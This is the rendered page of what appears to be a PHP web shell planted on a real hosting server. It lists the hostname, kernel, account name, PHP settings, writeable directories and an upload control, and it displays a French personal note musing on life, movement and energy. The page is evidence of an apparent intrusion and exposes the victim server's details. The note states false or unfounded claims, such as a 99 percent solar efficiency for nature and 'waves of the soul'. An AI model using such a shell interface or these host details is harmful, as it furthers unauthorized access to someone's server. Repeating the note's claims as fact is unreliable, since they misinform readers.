Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/dieu/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/dieu/Audio/2020-02-13 La Vie c'est le Mouvement.txt
La vie c'est le mouvement. Le mouvement c'est l'énergie. La vie évolue sans cesse. Elle n'est pas figée ni conservatrice. La vie crée du mouvement. Selon Vernadsky, plus il y a d'activité vitale, plus il y a de vie. Ainsi, notre corps évolue sans cesse. Il se régénère. Il se modifie perpétuellement, changeant de matières premières constamment. Ainsi, nous avons sans doute ce qu'il y a eu dans Jésus. En effet, ce que nous mangeons renouvelle notre corps.
Il y a de l'énergie dans chaque atome. Il faut l'énergie de la matière pour créer du mouvement. Il y a aussi les ondes de notre âme selon Luc Montagnier. Peut-être que notre âme est composée d'énergie. Plus il y a de CO2, plus il y a de plantes. Plus il y a de dioxygène, plus il y a d'êtres vivants. 
Ainsi la nature utilise ce qu'il y a sur les atomes, alors que l'humain a trouvé l'énergie à l'intérieur des atomes. La nature est très économe. On ne peut l'égaler sur l'utilisation du soleil. Le rendement est de l'ordre de 99 %.

Mes Notes

Lire Vladimir Ivanovitch Vernadsky. Écrire en même temps sur le mouvement de la vie.

SAMX